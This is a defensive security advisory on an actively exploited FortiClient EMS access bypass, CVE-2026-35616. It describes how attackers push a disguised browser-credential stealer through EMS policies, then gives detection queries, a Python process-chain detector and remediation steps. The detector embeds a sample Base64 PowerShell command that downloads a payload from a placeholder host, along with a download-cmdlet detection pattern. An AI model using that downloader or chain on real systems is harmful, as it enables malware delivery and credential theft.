FortiClient EMS CVE-2026-35616 (CVSS 9.1) Exploited
Fortinet FortiClient Endpoint Management Server (EMS) is affected by CVE-2026-35616, a critical pre-authentication API access bypass vulnerability leading to privilege escalation, carrying a CVSS score of 9.1. This vulnerability allows unauthorized attackers to gain elevated privileges on the EMS server without prior authentication. The flaw enables threat actors to manipulate critical management functions within the FortiClient EMS environment.
Recent intelligence indicates this vulnerability is actively exploited. Attackers use CVE-2026-35616 to deploy credential-stealing malware across managed endpoints. Attacks observed in May 2026 show attackers abusing the trusted endpoint management infrastructure to deliver malicious payloads disguised as legitimate Fortinet updates.
The primary objective of these campaigns is information theft, specifically targeting sensitive user data such as browser-saved credentials, session cookies, and autofill information. Exploiting this vulnerability bypasses initial authentication, giving attackers control over the FortiClient EMS server and, subsequently, its managed endpoints.
Impact
Exploiting CVE-2026-35616 gives an attacker complete control over FortiClient EMS and its managed endpoints, which leads directly to data exfiltration. Successful exploitation of this pre-authentication API access bypass (CVSS score: 9.1) allows attackers to modify EMS management configurations in a privileged context. This capability is then used to push malicious scripts for execution across all managed endpoints connected to the compromised EMS server. The core malicious payload observed is a previously unreported Windows information stealer, identified as FortiEndpoint_Patch.exe, which masquerades as a Fortinet update.
This information stealer harvests sensitive data from Chromium- and Gecko-based web browsers. Data targeted includes user passwords, session cookies, and autofill details such as credit card information, physical addresses, and phone numbers. The exfiltration of session cookies is a significant risk, as these can provide attackers with follow-on access to many cloud services, internal applications, and other authenticated resources. When session reuse is possible, these stolen session cookies may allow attackers to circumvent multi-factor authentication (MFA) prompts, giving them unauthorized, persistent access without needing actual credentials.
Because attackers abuse the FortiClient EMS's trust and management pathways, every endpoint managed by the compromised server becomes a potential execution target for the malicious payload. This removes the need for separate intrusion paths for each device, greatly expanding attack reach and efficiency. The compromised environment effectively turns the organization's own endpoint management solution into a distribution mechanism for malware, making it challenging for security teams to differentiate between legitimate and malicious operations. This broad compromise risk shows the importance of addressing CVE-2026-35616 immediately.
Exploitation Chain
CVE-2026-35616 exploitation begins with a critical pre-authentication API access bypass vulnerability that gives attackers privilege escalation on the FortiClient EMS server. This allows attackers to interact with EMS functionality in a privileged context without needing to authenticate first. This initial access allows manipulation of EMS's configuration and distribution of malicious payloads to managed endpoints. Our prior analysis of Fortinet authentication bypass flaws details how such vulnerabilities can provide initial access and control.
After compromising the FortiClient EMS server, attackers take these steps to prepare for malware delivery and maintain covert operations:
- Configuration Modification: Attackers modify EMS configurations. This includes deferring firmware upgrade reminders, likely to prevent legitimate updates from interfering or raising suspicion.
- Remote Access Profile Manipulation: A Remote Access Profile configuration is altered. This modification is critical, as it inserts a malicious script for execution on endpoint devices, using EMS's legitimate management pathway to push attacker-controlled code.
- Endpoint Policy Injection: Attackers further modify an endpoint policy to embed the malicious script, ensuring its widespread distribution and execution across all managed endpoints. This step effectively uses the trusted EMS system to propagate the threat, making it appear as a standard management task.
Malware execution on endpoints then follows a specific, multi-stage process:
- Legitimate Executable Abuse: The attack uses `fortitray.exe`, a FortiClient executable, to launch a `.cmd` script file. This technique blends malicious activity with normal system processes, making detection more challenging.
- PowerShell Invocation: The `.cmd` script invokes a Base64-encoded PowerShell script. Base64 encoding obfuscates malicious commands and evades simple signature-based detection.
- Payload Delivery: The PowerShell script downloads the primary malicious payload. This payload, named `FortiEndpoint_Patch.exe`, is disguised as a Fortinet endpoint update, exploiting user trust in official patches.
- Malware Execution and Data Harvesting: `FortiEndpoint_Patch.exe` executes as a Windows information stealer. This malware does not have its own network-based exfiltration capabilities. Instead, it harvests sensitive data like passwords, cookies, and autofill details from Chromium- and Gecko-based browsers. The collected data is written to a log file in the `ProgramData` directory on the compromised endpoint.
- Data Exfiltration: The same PowerShell script that delivered the payload then transmits the captured data. It exfiltrates the log file's contents to attacker-controlled infrastructure via an HTTP POST request. The observed attacker C2 server is `83.138.53[.]110`.
This execution pattern shows a sophisticated understanding of FortiClient EMS's operational mechanisms, allowing attackers to push malicious PowerShell commands that closely mimic legitimate management operations. This increases the attack's stealth and its ability to propagate across an organization's network. For more details on this vulnerability and its impact on Fortinet EMS, refer to our full analysis on CVE-2026-35616 and Fortinet EMS.
Affected products and versions
The vulnerability CVE-2026-35616 impacts specific versions of Fortinet FortiClient Endpoint Management Server (EMS).
- FortiClient Endpoint Management Server (EMS): All versions prior to 7.4.7.
Organizations running FortiClient EMS versions earlier than 7.4.7 should consider their installations vulnerable and potentially compromised, given the active exploitation.
Detection
Detecting exploitation of CVE-2026-35616 requires a multi-layered approach focusing on network, endpoint, and server-side indicators. Since the attack uses legitimate management pathways, anomalies in system behavior and process execution are crucial indicators.
Network Indicators:
- Outbound Connections to C2: Monitor all outbound network traffic from FortiClient EMS servers and managed endpoints for connections to `83.138.53[.]110`. Specifically, look for HTTP POST requests from these devices, which indicate data exfiltration.
- Unusual EMS Traffic Patterns: Establish a baseline for normal FortiClient EMS network communication. Deviations like unexpected spikes in outbound data or connections to unusual external IP addresses require investigation.
- Encrypted Traffic Anomalies: While the observed exfiltration uses HTTP POST, attackers may pivot to encrypted channels. Monitor for unusual SSL/TLS certificate usage or connections to newly observed domains from EMS and managed endpoints.
Endpoint Indicators (EDR/SIEM Queries):
- Process Creation Chains:
  - Look for `fortitray.exe` (a FortiClient component) spawning `cmd.exe`.
  - Then, investigate `cmd.exe` launching `powershell.exe`, especially with Base64-encoded arguments.
  - Sample EDR query (pseudo-code):

    ```
    Process.parent.name == "fortitray.exe" AND Process.name == "cmd.exe"
    followed by
    Process.parent.name == "cmd.exe" AND Process.name == "powershell.exe" AND Process.command_line CONTAINS "EncodedCommand"
    ```
- Malicious Payload Presence:
  - Search for files named `FortiEndpoint_Patch.exe` or similar suspicious executables in unexpected directories, especially in user profiles or the `ProgramData` directory.
  - Monitor for the creation of new executable files that mimic legitimate Fortinet update names.
- PowerShell Script Execution:
  - Detect PowerShell execution with `EncodedCommand` parameters. Decode and analyze commands for suspicious activities like downloading files from external URLs, modifying system configurations, or initiating network connections.
  - Look for PowerShell scripts creating log files in the `ProgramData` directory, particularly those containing sensitive data patterns (e.g., "password", "cookie").
- File System Changes:
  - Monitor for creation or modification of files within the `ProgramData` directory that appear to be temporary log files, especially those containing harvested credentials or browser data.
  - Look for suspicious `.cmd` script creations or modifications, particularly in directories associated with FortiClient or system startup.
- Registry and Configuration Changes:
  - Monitor for modifications to FortiClient EMS configurations related to firmware upgrade reminders, Remote Access Profiles, or endpoint policies. These changes indicate post-exploitation activity on the EMS server.
  - Detect unusual changes to FortiClient agent settings on managed endpoints that might allow for silent script execution or data collection.
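As an added example that is not part of the original advisory, the process-chain and `EncodedCommand` checks above implemented in Python over constructed Sysmon-style process-creation events: it reconstructs the `fortitray.exe` to `cmd.exe` to `powershell.exe` ancestry, decodes the Base64 argument the way PowerShell does (UTF-16LE), and flags download-related cmdlets in the decoded script. The sample events, pids, file paths and the placeholder URL are constructed, not observed indicators.

```python
import base64
import re
# Constructed sample script standing in for the encoded PowerShell the advisory
# describes; the URL is a placeholder, not a real indicator.
SAMPLE_SCRIPT = ("Invoke-WebRequest http://payload.example.invalid/FortiEndpoint_Patch.exe "
                 "-OutFile $env:ProgramData\\FortiEndpoint_Patch.exe")
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()  # -EncodedCommand is UTF-16LE
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed Sysmon-style process-creation events: (pid, ppid, image, command line).
EVENTS = [
    (4100, 900, r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe", "FortiTray.exe"),
    (4120, 4100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\ProgramData\update.cmd"),
    (4130, 4120, PS, "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED),
    (5000, 700, r"C:\Windows\explorer.exe", "explorer.exe"),  # benign chain, must not be flagged
    (5010, 5000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (5020, 5010, PS, "powershell.exe -Command Get-Date"),
]
# Download-related cmdlets and strings worth flagging in a decoded script.
DOWNLOAD_HINT = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|https?://", re.I)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded script when -EncodedCommand/-enc/-e is present, else None."""
    m = re.search(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def find_chains(events):
    """Flag powershell.exe whose parent is cmd.exe and whose grandparent is fortitray.exe."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    hits = []
    for pid, ppid, image, cmd in events:
        if image_name(image) != "powershell.exe":
            continue
        parent = by_pid.get(ppid)
        grand = by_pid.get(parent[0]) if parent else None
        if not (parent and grand and image_name(parent[1]) == "cmd.exe"
                and image_name(grand[1]) == "fortitray.exe"):
            continue
        script = decode_encoded_command(cmd)
        hits.append({"pid": pid, "encoded": script is not None,
                     "downloader": bool(script and DOWNLOAD_HINT.search(script)), "script": script})
    return hits
```

Running `find_chains(EVENTS)` returns one hit for pid 4130 with the decoded downloader script attached; the explorer-launched benign chain is ignored.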
Server-Side (FortiClient EMS) Indicators:
- API Access Anomalies: Review FortiClient EMS server logs for unauthorized or unexpected API access attempts, especially those without prior authentication. Look for successful API calls from untrusted sources that modify configuration settings related to endpoint policies or remote access profiles.
- Administrative Account Usage: Monitor for unusual activity by administrative accounts on the EMS server, especially if it coincides with configuration changes that enable script injection.
- Log Integrity: Verify FortiClient EMS log integrity to ensure the logs have not been tampered with or cleared by an attacker.
Organizations should integrate threat intelligence on known malware artifacts and C2 infrastructure into their detection systems to increase the likelihood of identifying these attacks.
Remediation
Because CVE-2026-35616 is actively exploited, immediate and complete remediation steps are critical to mitigate risk and restore environment integrity.
- Patching: The most urgent remediation is to upgrade all FortiClient Endpoint Management Server (EMS) installations to version 7.4.7 or later. Fortinet released patches for this pre-authentication API access bypass vulnerability. This update resolves the root cause of unauthorized access and privilege escalation.
- Compromise Assessment: Because CVE-2026-35616 is actively exploited, a thorough compromise assessment is mandatory for all environments running FortiClient EMS versions prior to 7.4.7. This assessment should include:
  - Review FortiClient EMS server logs for unauthorized configuration changes, API access anomalies, and unusual administrative activity.
  - Scan all managed endpoints for `FortiEndpoint_Patch.exe` (or similar suspicious executables) and related malicious files in the `ProgramData` directory.
  - Analyze endpoint logs for the process execution chain involving `fortitray.exe` spawning `cmd.exe` and then Base64-encoded `powershell.exe` commands.
  - Inspect network traffic logs for connections to the identified attacker C2 `83.138.53[.]110` or other suspicious external IPs.
- Credential Rotation: If a compromise is suspected or confirmed, or if EMS was unpatched for an extended period, mandate a password reset for all users. Prioritize users with access to critical cloud services, internal applications, and sensitive authenticated resources, as their browser-saved credentials and session cookies may have been exfiltrated.
- MFA and Session Management Review: Re-evaluate multi-factor authentication (MFA) policy strength and enforcement across all critical systems. Since stolen session cookies can bypass MFA, consider implementing stricter session validity durations and re-authentication requirements for high-privilege access.
- Endpoint Clean-up and Re-imaging: For endpoints confirmed to have executed the malicious payload, perform thorough clean-up, which may include re-imaging affected devices to ensure complete removal of the infostealer and any persistence mechanisms.
- Enhanced Monitoring: Implement enhanced monitoring for the detection indicators outlined above. This includes continuous monitoring of EMS server logs, endpoint process execution, file system changes, and network traffic for suspicious activities even after patching.
- Review and Harden EMS Configuration: Review FortiClient EMS configuration best practices, including network segmentation of the EMS server, restricting management interface access, and ensuring all EMS-related services run with the principle of least privilege.
Prompt action on these remediation steps will reduce the window of opportunity for attackers and limit the impact of this critical vulnerability.
Technical Takeaways
- CVE-2026-35616 is a critical pre-authentication API access bypass vulnerability in FortiClient EMS, rated with a CVSS score of 9.1. It allows for privilege escalation.
- The vulnerability is actively exploited, allowing attackers to gain unauthorized, privileged access to FortiClient EMS servers.
- Exploitation involves modifying EMS configurations and policies to use its legitimate management pathways for distributing malicious Base64-encoded PowerShell scripts to managed endpoints.
- The primary payload is a Windows information stealer (`FortiEndpoint_Patch.exe`) disguised as a Fortinet update. It harvests browser-saved credentials, session cookies, and autofill data from Chromium- and Gecko-based browsers.
- Stolen session cookies can provide follow-on access to cloud services and internal applications, potentially circumventing multi-factor authentication (MFA).
- Patching FortiClient EMS to version 7.4.7 or later is the immediate remediation. However, a complete compromise assessment and credential rotation are crucial due to active exploitation.